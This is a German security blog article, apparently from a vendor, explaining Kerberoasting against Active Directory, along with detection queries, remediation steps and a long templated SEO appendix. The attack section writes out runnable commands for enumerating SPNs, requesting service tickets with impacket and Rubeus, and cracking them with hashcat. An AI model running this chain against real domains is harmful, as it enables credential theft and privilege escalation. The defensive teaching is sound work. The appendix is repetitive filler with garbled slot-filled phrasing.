Was ist Kerberoasting?
Kerberoasting ist eine Active Directory-Angriffstechnik, die es jedem authentifizierten Domain-Benutzer ermöglicht, crackbare Passwort-Hashes von Dienstkonten zu extrahieren, ohne besondere Berechtigungen zu benötigen.
Der Angriff zielt auf Konten mit einem konfigurierten Service Principal Name (SPN) ab. In Kerberos kann jeder Domain-Benutzer ein Service Ticket (TGS) für jeden SPN anfordern. Dieses Ticket ist mit dem NTLM-Hash des Dienstkontos verschlüsselt. Ein Angreifer kann das Ticket anfordern, offline exportieren und den Hash mit einem Standard-Passwort-Cracker knacken.
Keine erhöhten Rechte erforderlich. Keine Interaktion mit dem Zielkonto. Kein Alert auf dem Zielsystem.
⚠️ Warum das kritisch ist: Dienstkonten haben oft Passwörter, die nie ablaufen, vor Jahren gesetzt wurden und nie denselben Komplexitätsanforderungen unterlagen wie Benutzerkonten.
Funktionsweise
Wenn ein Benutzer auf einen Dienst zugreifen möchte, stellt Kerberos ein TGS-Ticket aus, das mit dem NTLM-Hash des Kontos, das den Dienst betreibt, verschlüsselt ist. Das KDC prüft nicht, ob der anfragende Benutzer tatsächlich Zugriff benötigt: Es stellt das Ticket einfach aus.
Jeder Domain-Benutzer kann beliebig viele Service Tickets für beliebige SPNs sammeln, ohne jede Autorisierungsprüfung.
Die Angriffskette
Schritt 1 - SPNs aufzählen
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName, PasswordLastSet, PasswordNeverExpires |
Select-Object SamAccountName, ServicePrincipalName, PasswordLastSet, PasswordNeverExpires
impacket-GetUserSPNs -dc-ip 10.10.0.1 corp.local/user:password
Interessante Ziele: Konten mit PasswordNeverExpires = True, alten PasswordLastSet-Daten, lesbaren Namen wie svc_sql, svc_backup.
Schritt 2 - Service Tickets anfordern
.\Rubeus.exe kerberoast /outfile:hashes.txt
impacket-GetUserSPNs -dc-ip 10.10.0.1 corp.local/user:password -request -outputfile hashes.txt
Schritt 3 - Offline knacken
# Modus 13100 für RC4
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt --rules-file best64.rule
# Modus 19700 für AES-256
hashcat -m 19700 hashes.txt /usr/share/wordlists/rockyou.txt
Schritt 4 - Lateral Movement und Privilegieneskalation
Ein geknacktes Dienstkonto-Passwort öffnet den Zugang zu allem, worauf dieses Konto Zugriff hat. Bei überprivilegierten Dienstkonten kann dies einen direkten Weg zu Domain Admin bedeuten.
Erkennung
Windows Event IDs
| Event ID | Quelle | Worauf zu achten ist |
|---|---|---|
| 4769 | DC - Security | TGS mit RC4-Verschlüsselung (0x17) obwohl AES Standard ist |
| 4769 | DC - Security | Viele TGS-Anfragen für verschiedene SPNs in kurzer Zeit von einem Konto |
SIEM-Erkennungsabfrage (Elastic KQL)
event.code: "4769" AND
winlog.event_data.TicketEncryptionType: "0x17" AND
NOT winlog.event_data.ServiceName: ("krbtgt" OR "*$")
💡 Tipp: Erzwingen Sie AES-only in Ihrer Domain. Jede RC4-Anfrage wird dann zu einem Hochvertrauens-Alert.
Behebung
💡 Schnelle Massnahme: Auditieren Sie Dienstkonten mit
PasswordNeverExpires = Trueund rotieren Sie alle Passwörter, die älter als ein Jahr sind.
-
Starke, lange Passwörter - mindestens 25 Zeichen, zufällig generiert.
-
Group Managed Service Accounts (gMSA) - 240-Zeichen-Passwörter, automatisch von AD verwaltet und rotiert.
New-ADServiceAccount -Name gMSA_SQL -DNSHostName sql.corp.local -PrincipalsAllowedToRetrieveManagedPassword "SQL_Servers"
Install-ADServiceAccount -Identity gMSA_SQL
- AES erzwingen auf Dienstkonten.
Set-ADUser -Identity svc_sql -Replace @{msDS-SupportedEncryptionTypes=24}
- Minimale Berechtigungen - Dienstkonten sollten nur die für ihre Funktion erforderlichen Berechtigungen haben.
So Erkennt EtcSec Dies
EtcSec identifiziert die Bedingungen, die Kerberoasting ermöglichen, bevor ein Angreifer sie ausnutzt.
Die KERBEROASTING_RISK-Erkennung meldet alle Konten mit konfiguriertem SPN, die aufgrund schwacher Passwort-Postur angreifbar sind.
Verwandte Prüfungen:
- PASSWORD_NEVER_EXPIRES - nie ablaufende Passwörter bleiben nach Hash-Diebstahl dauerhaft crackbar
- PASSWORD_POLICY_WEAK - schwache Richtlinie macht Cracking wahrscheinlicher
- KERBEROS_RC4_FALLBACK - RC4 noch erlaubt beschleunigt das Cracking erheblich
<!-- codex-related-reading:start -->ℹ️ Hinweis: EtcSec prüft diese Schwachstellen automatisch bei jedem AD-Audit. Starten Sie ein kostenloses Audit, um exponierte Dienstkonten zu identifizieren.
Verwandte Beiträge
Dieses Thema sollte immer gemeinsam mit AS-REP Roasting: Hashes Ohne Anmeldedaten Sammeln, AD-Passwortsicherheit: Fehlkonfigurationen die Angreifer Lieben und Veraltete und Überprivilegierte Konten in AD bewertet werden. Diese Beiträge decken die benachbarten Angriffspfade, die zugrunde liegenden Privilegannahmen und die Kontrolllücken ab, die in realen Identity-Bewertungen meist in derselben Kette auftauchen.
- AS-REP Roasting: Hashes Ohne Anmeldedaten Sammeln
- AD-Passwortsicherheit: Fehlkonfigurationen die Angreifer Lieben
- Veraltete und Überprivilegierte Konten in AD
So prüfen Sie nicht nur ein einzelnes Symptom, sondern ob Sie eine zusammenhängende Angriffskette im Verzeichnis- und Cloud-Identity-Umfeld wirklich schließen.
<!-- codex-related-reading:end --> <!-- codex-seo-appendix:start -->Operativer Geltungsbereich fur Kerberoasting: Wie Angreifer Dienstkonto-Passwörter Knacken
Kerberoasting: Wie Angreifer Dienstkonto-Passwörter Knacken sollte als reale Exposition in Ihre Active-Directory-Umgebung behandelt werden und nicht als einzelner isolierter Fehler. Zuerst muss der tatsachliche Prufumfang definiert werden: welche privilegierte Gruppen, Dienstkonten, ACLs, GPO-Verknupfungen, Trusts, Delegationen, Zertifikatvorlagen und Admin-Workstations betroffen sind, welche Geschaftsprozesse davon abhangen, welche Privilegien freigelegt werden und welche Notfallausnahmen sich mit der Zeit angesammelt haben. Diese Einordnung verhindert oberflachliche Remediation, weil das technische Symptom oft kleiner ist als der operative Blast Radius. Wenn der gesamte Pfad von Konfiguration uber Berechtigung bis zur Nutzung dokumentiert ist, kann das Team Anderungen priorisieren, die Risiko schnell reduzieren, ohne den Betrieb zu blockieren.
Was Angreifer zuerst prufen
Sobald Angreifer in Ihre Active-Directory-Umgebung angekommen sind, bleiben sie selten beim ersten Schwachpunkt stehen. Rund um Kerberoasting: Wie Angreifer Dienstkonto-Passwörter Knacken testen sie meist, ob sich der Zugang mit veraltete privilegierte Konten, gefahrliche Gruppenverschachtelung, ubermassige Delegation, schwache Passwortrichtlinien und geerbter ACL-Missbrauch verketten lasst. Deshalb muss die Verteidigung nicht nur die Hauptschwache, sondern auch jede benachbarte Abhangigkeit prufen, die initialen Zugriff in Persistenz oder Eskalation verwandeln kann. Klarheit uber Identitaten, Rollen, Rechte und Vertrauensannahmen ist hier entscheidend. Wenn ein Fix nur ein einzelnes Objekt schliesst, wahrend benachbarte Privilegpfade offen bleiben, verandert sich das reale Risiko kaum. Eine saubere Kettenanalyse ist daher zentral fur eine belastbare Härtung.
Belege und Telemetrie sammeln
Eine belastbare Reaktion auf Kerberoasting: Wie Angreifer Dienstkonto-Passwörter Knacken braucht Belege, die Technik, Detection und Governance gemeinsam auswerten konnen. Ziehen Sie Event IDs 4624, 4662, 4670, 4688, 4728, 4732, 4768, 4769, 5136, SYSVOL-Anderungen und Zertifikatsaktivitat, vergleichen Sie frische Anderungen mit geplanten Wartungsfenstern und isolieren Sie Konten oder Objekte mit Verhalten ohne klare Geschaftsbegrundung. Diese Belege sollten drei Fragen beantworten: wann die Exposition entstanden ist, wer sie noch nutzen kann, und ob gleichartige Pfade an anderer Stelle in Ihre Active-Directory-Umgebung existieren. Gute Telemetrie trennt ausserdem alte technische Schuld von aktiv ausnutzbarem Verhalten. Diese Trennung ist wichtig, weil die Remediation fur Altlasten anders gesteuert wird als fur eine Schwache mit deutlichen Missbrauchssignalen.
Benachbarte Schwachen mitprufen
Kaum eine Umgebung enthalt Kerberoasting: Wie Angreifer Dienstkonto-Passwörter Knacken allein. In der Praxis finden sich in derselben Tenant- oder AD-Zone oft auch veraltete privilegierte Konten, gefahrliche Gruppenverschachtelung, ubermassige Delegation, schwache Passwortrichtlinien und geerbter ACL-Missbrauch, und genau diese Nachbarschwachen entscheiden, ob der Pfad nur unsauber oder wirklich kritisch ist. Prufen Sie gemeinsame Owner, geerbte Rechte, doppelte Ausnahmen und administrative Abkurzungen, die nie zuruckgebaut wurden. Wenn dieselbe risikoreiche Entscheidung an mehreren Stellen auftaucht, liegt meist ein Prozessproblem und nicht nur ein Einzelfehler vor. Diese erweiterte Sicht verbessert die Chance, den gesamten Angriffspfad zu entfernen statt nur eine sichtbare Stelle zu glatten.
Remediation in sinnvoller Reihenfolge
Bei Kerberoasting: Wie Angreifer Dienstkonto-Passwörter Knacken sollte die Remediation zuerst dort ansetzen, wo Risiko am schnellsten sinkt. Entfernen Sie zunachst die Pfade mit dem hochsten Eskalationswert, harten Sie danach die wichtigsten Identitaten oder Objekte, und bereinigen Sie erst anschliessend sekundare Hygieneprobleme. Nutzen Sie Tiering, Delegationsbereinigung, ACL-Review, Hygiene fur Dienstkonten, GPO-Berechtigungsprufung und ADCS-Hardening als Zielbild. Jede Anderung braucht einen Verantwortlichen, eine Rollback-Notiz und einen klaren Validierungsschritt. So verhindert man, dass ein Verbesserungsprojekt nach dem ersten technischen Erfolg stehen bleibt. Wenn ein kompletter Umbau heute nicht realistisch ist, definieren Sie Zwischenkontrollen und planen Sie die strukturelle Arbeit in den nachsten wochentliche Privilegienprufung und monatliche Kontrollvalidierung.
Validierung nach jeder Anderung
Nach jeder Anderung rund um Kerberoasting: Wie Angreifer Dienstkonto-Passwörter Knacken muss das Ergebnis sowohl aus Admin-Sicht als auch aus Angreifer-Sicht validiert werden. Bestatigen Sie, dass legitime Nutzer und Systeme weiter funktionieren, und zeigen Sie zugleich, dass der gefahrliche Pfad nicht mehr dieselbe Wirkung hat. Wiederholen Sie die Sammlung auf Basis von Event IDs 4624, 4662, 4670, 4688, 4728, 4732, 4768, 4769, 5136, SYSVOL-Anderungen und Zertifikatsaktivitat, prufen Sie Genehmigungen und stellen Sie sicher, dass kein Nachbarobjekt denselben Umgehungsweg offenhalt. Gute Validierung enthalt ausserdem schriftliche Erfolgskriterien. In reifen Teams gilt ein Fix erst dann als abgeschlossen, wenn der Risikopfad geschlossen, der Betrieb intakt und der neue Zustand mit dem gewunschten Härtungsziel deckungsgleich ist.
Ownership, Eskalation und Governance
Themen wie Kerberoasting: Wie Angreifer Dienstkonto-Passwörter Knacken scheitern, wenn das technische Symptom verschwindet, aber niemand die dauerhafte Kontrolle ubernimmt. Verteilen Sie klare Verantwortung uber Directory Engineering, SOC-Analysten, Identity-Admins und Server-Verantwortliche, definieren Sie Ausnahmeregeln und legen Sie fest, welche Rolle einen risikoreichen Re-Import oder eine Lockerung freigeben darf. Diese Governance ist nicht Selbstzweck. Sie verhindert, dass Migrationen, Notfallanderungen oder Drittanbieter-Integrationen denselben Pfad in wenigen Wochen erneut offnen. Dokumentieren Sie daher, welche Entscheidungen die Schwache moglich gemacht haben, und aktualisieren Sie den Prozess so, dass neue Anfragen gegen die neue Baseline gepruft werden statt gegen alte Abkurzungen.
Fragen fur die Review-Runde
In Review-Terminen zu Kerberoasting: Wie Angreifer Dienstkonto-Passwörter Knacken helfen konkrete Fragen mehr als allgemeine Aussagen. Welche Objekte haben mehr Rechte als notig? Welche Ausnahme lebt nur weiter, weil nach Projektende niemand mehr zuruckgeschaut hat? Welches Team wurde einen Missbrauch zuerst erkennen, und auf welche Belege wurde es sich stutzen? Welche Geschaftsabhangigkeit blockiert die Korrektur heute, und welcher Kompensationskontroll existiert bis dahin? Solche Fragen decken operative Unklarheiten auf, die aus reinen Konfigurationslisten nicht sichtbar werden. Gleichzeitig verbinden sie Identitatsdesign, Logging-Qualitat, Ownership und Change Management in einer gemeinsamen Bewertung.
Erwartung an kontinuierliche Uberwachung
Eine einmalige Bereinigung rund um Kerberoasting: Wie Angreifer Dienstkonto-Passwörter Knacken liefert weniger versteckte Eskalationspfade, klarere Verantwortlichkeit und bessere Trennung zwischen Betrieb und Privilegien nur dann, wenn Monitoring dauerhaft etabliert wird. Verankern Sie wiederkehrende Prufungen auf Basis von Event IDs 4624, 4662, 4670, 4688, 4728, 4732, 4768, 4769, 5136, SYSVOL-Anderungen und Zertifikatsaktivitat, sehen Sie sich die sensibelsten Objekte im nachsten wochentliche Privilegienprufung und monatliche Kontrollvalidierung erneut an und behandeln Sie Drift wie ein Sicherheitsereignis. Ziel ist nicht mehr Larm, sondern bessere Erkennung relevanter Anderungen: neue privilegierte Rollen, entspannte Kontrollen, reaktivierte Konten, breitere Ausnahmen oder Owner-Wechsel ohne saubere Ubergabe. Wenn diese Signale regelmassig gepruft werden, wird die Umgebung gleichzeitig sicherer und besser gegenuber Auditoren oder Management erklarbar.
30-Tage-Verbesserungsplan
Behandeln Sie Kerberoasting: Wie Angreifer Dienstkonto-Passwörter Knacken in den nachsten 30 Tagen als kompaktes Härtungsprogramm. Woche 1: Umfang, Abhangigkeiten und Verantwortliche bestatigen. Woche 2: die riskantesten Pfade schliessen und die wichtigsten Tiering, Delegationsbereinigung, ACL-Review, Hygiene fur Dienstkonten, GPO-Berechtigungsprufung und ADCS-Hardening erzwingen. Woche 3: die Remediation mit frischer Telemetrie validieren und benachbarte Schwachen bereinigen. Woche 4: die Erkenntnisse in wiederkehrende Kontrollen, Freigaberegeln und Reporting uberfuhren. Dieser kurze Zyklus verbindet technische Verbesserung mit organisatorischer Reife. Am Ende sollte klar sein, was exponiert war, was verandert wurde, was noch architektonische Arbeit braucht und wie das Risiko kunftig uberwacht wird.
<!-- codex-seo-appendix:end -->
